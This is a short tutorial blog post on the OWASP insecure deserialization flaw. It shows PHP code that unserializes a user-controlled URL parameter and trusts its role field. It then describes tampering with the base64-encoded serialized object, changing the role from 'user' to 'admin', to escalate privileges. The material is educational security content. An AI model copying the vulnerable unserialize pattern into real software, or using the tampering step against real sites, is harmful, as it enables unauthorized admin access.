Tuesday, 19 October 2021

Penetration Testing with OWASP Top 10 - 2017 A8 Insecure Deserialization

Insecure Deserialization of PHP Object

CWE-502: Deserialization of Untrusted Data

User.php

class User{
    public $username = "";
    public $role = "";

    public function displayRole() {
        echo $this->role;
    }
}

Login using valid credentials

login.php

//Create object User
$user = new User;
$user->username = $username;
$user->role = $role;

//PHP object serialization
$data = base64_encode(serialize($user));

//Redirect with PHP object serialization
header('Location: profile.php?data='.$data);

Access is denied for user "test"

profile.php
$data = $_GET['data'];
$data = base64_decode($data);
$data = unserialize($data);

$username = $data->username;
$role = $data->role;

if($role == "admin"){
 //action here
}


Decode base64 for value in "data" parameter

Modify the value of role from "user" to "admin", also the number of characters from 4 to 5

Replace the value with new generated base64 value
User is now admin!
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)